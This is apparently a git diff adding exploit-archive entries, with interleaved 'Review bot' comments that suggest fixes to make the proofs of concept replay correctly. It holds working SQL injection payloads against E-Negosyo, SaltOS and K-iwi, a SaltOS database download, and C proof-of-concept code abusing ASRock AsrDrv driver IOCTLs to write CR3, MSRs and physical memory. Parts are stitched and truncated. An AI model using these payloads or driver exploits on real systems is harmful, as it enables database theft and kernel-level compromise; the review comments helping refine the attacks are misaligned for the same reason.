+Cookie: remember=0; PHPSESSID=ek24koab445aab70seegi02lh3
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 00:23:54 GMT
+Server: Apache/2.2.16 (Win32) PHP/5.3.3
+X-Powered-By: PHP/5.3.3
+Expires: 0
+Cache-Control: must-revalidate, post-check=0, pre-check=0
+Pragma: public
+Content-Length: 1771
+Content-Disposition: attachment; filename="efe.php"
+Content-Transfer-Encoding: binary
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: 
\ No newline at end of file
diff --git a/exploits/php/webapps/45730.txt
new file mode 100644
index 000000000..1cc367bfd
--- /dev/null
+++ b/exploits/php/webapps/45730.txt
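Review bot: The listing's `#28 if(!check_user()) die();` means download.php only runs for a logged-in user, and the request relies on a `PHPSESSID` cookie, so the unqualified "Arbitrary File Download" title should be qualified as authenticated; suggest adding `# Note: requires a valid logged-in session (check_user() at line 28)` under the header. The visible root cause is `#30 $file="files/".getParam("file");` with no path normalisation, which is why `file=../config.php` leaves the directory; `size` and `type` are likewise caller-controlled, which is presumably why the captured response ends with an empty `Content-Type:`. The `Version` line says `3.1 r0 / 3.x` while the software link is the 3.0-1190 build, which is worth reconciling.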
@@ -0,0 +1,39 @@ +# Exploit Title: E-Negosyo System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bsenordering_9-23-18.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18801 + +# POC: +# 1) +# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] +# +GET /[PATH]/index.php?q=product&category=Cakes%27%20%20UNION%20SELECT%201,2,3,4,5,6,7,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),9,10,11,12,13,14,15,16,17,18,19,20--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 20:24:30 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?q=single-item&id=[SQL] +# .... \ No newline at end of file diff --git a/exploits/php/webapps/45731.txt b/exploits/php/webapps/45731.txt new file mode 100644 index 000000000..914171c77 --- /dev/null 
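Review bot: The path given under `# POC: 1)` (`/[PATH]/student/index.php?view=view&id=[SQL]`) does not match the request that follows, which injects through `index.php?q=product&category=`; it appears copied from another write-up and should read `# http://localhost/[PATH]/index.php?q=product&category=[SQL]`. POC 2 names `q=single-item&id=[SQL]` but provides no request or evidence, so either add the request or mark that item as untested.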
+++ b/exploits/php/webapps/45731.txt 
@@ -0,0 +1,50 @@
+# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.saltos.org/
+# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32
+# Version: 3.1 r0 / 3.x
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18761
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index.php
+#
+POST /index.php HTTP/1.1
+Host: http://localhost/[PATH]:57187
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost/[PATH]:57187/index.php
+Content-Length: 1318
+Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; lang=en_US; __lang__=1543313377; style=blue; __style__=1543313377; iconset=silk; __iconset__=1543313377
+DNT: 1
+Connection: keep-alive
+action=login&querystring=&user=%2531%2527%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%2575%256e%2574%2528%252a%2529%252c%2563%256f%256e%2563%2561%2574%2528%2528%2573%2565%256c%2565%2563%2574%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%2528%2563%2561%2573%2574%2528%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%2561%2573%2520%2563%2568%2561%2572%2529%252c%2530%2578%2537%2565%2529%2529%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2577%2568%2565%2572%2565%2520%2574%2561%2562%256c%2565%255f%2573%2563%2568%2565%256d%2561%253d%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%256c%2569%256d%2569%2574%2520%2530%252c%2531%2529%252c%2566%256c%256f%256f%2572%2528%2572%2561%256e%2564%2528%2530%2529%252a%2532%2529%2529%2578%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2567%2572%256f%2575%2570%2520%2562%2579%2520%2578%2529%2561%2529%2520%2541%254e%2544%2520%2527%2545%2566%2565%2527%253d%2527%2545%2566%2565&pass=x&lang=en_US&style=blue&iconset=silk +HTTP/1.1 200 OK +Host: localhost/[PATH]:57187 +Connection: close +X-Powered-By: PHP/5.4.15 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; path=\ +Set-Cookie: user=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: __user__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: pass=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: __pass__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: remember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: 
__remember__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: lang=en_US; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: __lang__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: style=blue; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: __style__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: iconset=silk; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: __iconset__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Content-Type: text/html;charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45733.txt b/exploits/php/webapps/45733.txt new file mode 100644 index 000000000..ec8eba5c7 --- /dev/null +++ b/exploits/php/webapps/45733.txt 
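Review bot: `Host: http://localhost/[PATH]:57187` is not a valid Host header (it carries a scheme and a path), so replaying the request as-is fails on most servers; use `Host: TARGET` as the other entries do, and fix the `Referer` the same way. The `user` value is double URL-encoded (`%2531%2527...` decodes to `%31%27...`), which implies the application decodes the parameter a second time before building the query; that should be stated explicitly because a single-encoded payload would presumably not trigger. The captured response shows only cookie resets and no body, so it does not by itself demonstrate the error-based extraction; including the response fragment containing the database name would make the claim verifiable.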
@@ -0,0 +1,39 @@ +# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.saltos.org/ +# Software Link: https://excellmedia.dl.sourceforge.net/project/saltos/stable/SaltOS-3.1-8126.linux-i686.tgz +# Version: 3.1 r0 / 3.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18763 + +# POC: +# 1) +# http://localhost/[PATH]/index.php +# +POST /[PATH]/index.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 747 +Cookie: PHPSESSID=il9r6344ch0ned04kg1hpc7l45; lang=en_US; __lang__=1543322831; style=blue; __style__=1543322831; iconset=silk; __iconset__=1543322831 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +action=ajax&query=numbers&page=usuarios&action2=list%27%29%20%61%6e%44%20%28%53%45%4c%65%63%74%20%31%35%35%20%46%72%6f%4d%28%53%45%4c%45%43%54%20%43%4f%75%6e%74%28%2a%29%2c%43%4f%6e%63%61%54%28%63%6f%6e%43%41%54%28%30%78%32%30%33%61%32%30%2c%55%73%65%52%28%29%2c%44%61%74%41%42%41%53%45%28%29%2c%56%45%72%53%49%6f%4e%28%29%29%2c%30%78%37%65%2c%28%73%65%6c%65%43%54%20%28%65%6c%54%28%31%35%35%3d%31%35%35%2c%31%29%29%29%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%66%6c%6f%4f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%66%72%4f%4d%20%49%4e%46%6f%72%6d%41%54%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%4c%75%67%49%4e%53%20%47%72%6f%55%50%20%42%59%20%78%29%61%29%20%41%6e%64%20%28%27%45%66%65%27%3d%27%45%66%65&id=0: undefined +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:12:53 GMT +Server: Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16 +X-Powered-By: SaltOS v3.1 r8126 +Expires: -1 +Cache-Control: no-store, no-cache, 
must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Connection: keep-alive, close +Content-Type: text/html;charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/45734.txt b/exploits/php/webapps/45734.txt new file mode 100644 index 000000000..76e702674 --- /dev/null +++ b/exploits/php/webapps/45734.txt @@ -0,0 +1,47 @@ +# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - Database File Download +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.saltos.org/ +# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32 +# Version: 3.1 r0 / 3.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18762 + +# POC: +# 1) +# http://localhost/[PATH]/files/saltos.db +# +# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2853 [200]: /index.php?action=logout +# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2856 [200]: / +# [Mon Oct 29 00:05:51 2018] 127.0.0.1:2857 [200]: /files/saltos.db +# +GET /files/saltos.db HTTP/1.1 +Host: localhost:57187 +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=a06furpg1gf54hqf573l886qs3; lang=es_ES; __lang__=1543317075; style=blue; __style__=1543317075; iconset=silk; __iconset__=1543317075 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Host: localhost:57187 +Connection: close +Content-Type: application/octet-stream +Content-Length: 8462336 + +query('SELECT * FROM tbl_usuarios'); + +while ($p = $sonuc->fetchArray()) {?> + +
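Review bot: The request body ends in `&id=0: undefined`, which looks like a JavaScript capture artifact rather than a real value and will be sent literally by anyone replaying the request; `&id=0` is presumably what was intended. Since `action2` is the injected parameter here, naming it in the title would also distinguish this entry from 45731, which carries the identical title.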

+

+ + \ No newline at end of file diff --git a/exploits/php/webapps/45735.txt b/exploits/php/webapps/45735.txt new file mode 100644 index 000000000..4c72c2480 --- /dev/null +++ b/exploits/php/webapps/45735.txt 
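Review bot: The PHP fragment after the captured response is truncated — the opening tag, the call that opens the downloaded SQLite file and the markup that prints each row are missing, leaving only `query('SELECT * FROM tbl_usuarios')` and a `fetchArray()` loop — so a reader cannot reproduce the extraction step. Either restore it or replace it with a one-line instruction such as `# open files/saltos.db with sqlite3 and run: SELECT * FROM tbl_usuarios;`. The condition the PoC actually demonstrates is that `files/saltos.db` is served from the web root with no access control, which is what the advisory should name as the thing to check for.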
@@ -0,0 +1,59 @@ +# Exploit Title: K-iwi Framework 1775 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.k-iwi.com/ +# Software Link: https://sourceforge.net/projects/k-iwi/files/latest/download +# Version: 1775 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18755 + +# POC: +# 1) +# http://localhost/[PATH]/index.php?route=admin/user/group/update&token=&user_group_id=[SQL] +# +GET /[PATH]/index.php?route=admin/user/group/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_group_id=1%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:45:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; path=/ +Set-Cookie: language=it_IT; expires=Sun, 25-Nov-2018 17:56:01 GMT; Max-Age=2592000; path=/; domain=192.168.1.27 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache 
+Content-Length: 1105 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?route=admin/user/user/update&token=&user_id=[SQL] +# +GET /[PATH]/index.php?route=admin/user/user/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_id=11%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; language=it_IT +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:52:50 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1105 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/dos/45716.txt b/exploits/windows/dos/45716.txt new file mode 100644 index 000000000..61cd44301 --- /dev/null +++ b/exploits/windows/dos/45716.txt 
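Review bot: Both requests go through `route=admin/user/...` with a `token=` value, and the comment lines leave `token=` blank, so the PoC depends on an administrator session whose token the reader must obtain first; that prerequisite should be stated, e.g. `# Note: requires a valid admin session token`. Both captured responses are exactly `Content-Length: 1105`, and the first request sends no cookie yet receives a fresh `PHPSESSID`, which suggests the returned page may be the login form rather than the error-based output; including the response body fragment with the database name would substantiate the injection.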
@@ -0,0 +1,503 @@ +SecureAuth - SecureAuth Labs Advisory +http://www.secureauth.com/ + +ASRock Drivers Elevation of Privilege Vulnerabilities + +1. *Advisory Information* + +Title: ASRock Drivers Elevation of Privilege Vulnerabilities +Advisory ID: CORE-2018-0005 +Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities +Date published: 2018-10-25 +Date of last update: 2018-10-25 +Vendors contacted: ASRock +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed +IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with +Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient +Access Control [CWE-782] +Impact: Code execution +Remotely Exploitable: No +Locally Exploitable: Yes +CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712 + +3. *Vulnerability Description* + +ASRock's website states that [1]: + +ASRock Inc. is established in 2002, specialized in the field of +motherboards. With the 3C design concept, Creativity, Consideration, +Cost-effectiveness, the company explores the limit of motherboards +manufacturing while paying attention on the eco issue at the same +time, developing products with the consideration of eco-friendly +concept. ASRock has been growing fast and become world third largest +motherboard brand with headquarter in Taipei, Taiwan and branches in +Europe and the USA. + +ASRock offers several utilities designed to give the user with an ASRock +motherboard more control over certain settings and functions. +These utilities include various features like the RGB LED control, +hardware monitor, fan controls, and overclocking/voltage options. + +Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys +low level drivers, installed by ASRock RGBLED and other ASRock branded +utilities, which could allow a local attacker to elevate privileges. + +4. 
*Vulnerable Packages*
+
+ . ASRock RGBLED before v1.0.35.1
+ . A-Tuning before v3.0.210
+ . F-Stream before v3.0.210
+ . RestartToUEFI before v1.0.6.2
+
+5. *Vendor Information, Solutions and Workarounds*
+
+ASRock published the following fixed applications for each of its
+motherboards models:
+
+ . ASRock RGBLED v1.0.36
+ . A-Tuning v3.0.216
+ . F-Stream v3.0.216
+ . RestartToUEFI v1.0.7
+
+Downloads are available on the ASRock website.
+
+6. *Credits*
+
+These vulnerabilities were discovered and researched by Diego Juarez.
+The publication of this advisory was coordinated by Leandro Cuozzo
+from SecureAuth Advisories Team.
+
+7. *Technical Description / Proof of Concept Code*
+
+ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
+use a low level driver to program and query the status on embedded ICs
+on their hardware. Fan curves, clock frequencies, LED colors, thermal
+performance, and other user customizable properties and monitoring
+functionality are exposed to applications through this low level kernel
+driver.
+
+The main subjects of this advisory are the device drivers
+installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys).
+>From now on addressed as "AsrDrv". Default installation allows
+non-privileged user processes (even running at LOW INTEGRITY) to get a
+HANDLE and issue IOCTL codes to the driver.
+
+The following sections describe the problems found.
+
+7.1. *CR register access*
+
+[CVE-2018-10709]
+
+AsrDrv exposes functionality to read and write CR register values. This
+could be leveraged in a number of ways to ultimately run code with
+elevated privileges. 
+ +/----- +// Asrock RGBLED PoC demonstrating non-privileged access to CR registers + +#include +#include + +#define IOCTL_ASROCK_READCR 0x22286C +#define IOCTL_ASROCK_WRITECR 0x222870 + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_CR_STRUCT { + ULONG64 reg; + ULONG64 value; +} ASROCK_CR_STRUCT; + +#pragma pack(pop) + +#define IOCTLMACRO(iocontrolcode, size) \ + ULONG64 outbuffer[2] = { 0 }; \ + DWORD returned = 0; \ + DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ + return outbuffer[1]; \ + +ULONG64 ASROCK_ReadCR(DWORD reg) +{ + ASROCK_CR_STRUCT inbuffer = { 3, 0}; + IOCTLMACRO(IOCTL_ASROCK_READCR, 10) +} + +ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value) +{ + ASROCK_CR_STRUCT inbuffer = { reg, value}; + IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10) +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char* argv[]) +{ + printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n"); + + if (!InitDriver()) { + printf("InitDriver failed! - aborting...\n"); + exit(0); + } + + ULONG64 a = ASROCK_ReadCR(3); + printf("CR3 (PageDir): %llx\n", a); + printf("press ENTER for instant system CRASH\n"); + getchar(); + + a = ASROCK_WriteCR(3, 0xffff1111ffff2222); + + CloseHandle(ghDriver); +} +-----/ + +7.2. *Arbitrary physical memory read/write* + +[CVE-2018-10710] + +AsrDrv's IOCTL code 0x22280C exposes a functionality to read and write +arbitrary physical memory, this could be leveraged by a local attacker +to elevate privileges. 
+ +Proof of Concept: + +/----- +// Asrock RGBLED PoC (arbitrary physical memory write) +// This PoC demonstrates arbitrary write to physical memory. + +#include +#include + +#define IOCTL_ASROCK_WRITEPH 0x22280C + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_PH_STRUCT { + ULONG64 destPhysical; + DWORD size; + DWORD unk0; + ULONG64 src; +} ASROCK_PH_STRUCT; + +#pragma pack(pop) + +BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size) +{ + ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src}; + + BYTE outbuffer[0x30] = { 0 }; + + DWORD returned = 0; + DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); + if (returned) { + return TRUE; + } + return FALSE; +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char * argv[]) +{ + printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n"); + if (!InitDriver()) { + exit(0); + } + + printf("press ENTER for SYSTEM CRASH\n"); + getchar(); + ULONG64 data = 0xFFFF1111FFFF2222; + for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) { + printf("."); + ASROCK_ph_memcpy(i, (ULONG64)&data, 8); + } + + CloseHandle(ghDriver); + return 0; +} +-----/ + +7.3. *MSR Register access* + +[CVE-2018-10711] + +AsrDrv exposes functionality to read and write Machine Specific +Registers (MSRs). This could be leveraged to execute arbitrary ring-0 +code. 
+ +Proof of Concept: + +/----- +// Asrock RGBLED PoC demonstrating non-privileged access to MSR registers + +// This PoC demonstrates non privileged MSR access by reading +// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR) +// and then writing garbage to it (instant BSOD!) + +#include +#include + +#define IOCTL_ASROCK_RDMSR 0x222848 +#define IOCTL_ASROCK_WRMSR 0x22284C + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_MSRIO_STRUCT { + ULONG64 valLO; // + DWORD reg; // + ULONG64 valHI; // +} ASROCK_MSRIO_STRUCT; + +#pragma pack(pop) + +#define IOCTLMACRO(iocontrolcode, size) \ + ASROCK_MSRIO_STRUCT outbuffer = { 0 };\ + DWORD returned = 0; \ + DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL); \ + return (outbuffer.valHI<<0x20 | outbuffer.valLO); \ + +ULONG64 GIO_RDMSR(DWORD reg) +{ + ASROCK_MSRIO_STRUCT inbuffer = { 0, reg }; + IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20) +} + +ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value) +{ + ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 }; + IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20) +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char * argv[]) +{ + printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n"); + + if (!InitDriver()) { + printf("InitDriver failed! 
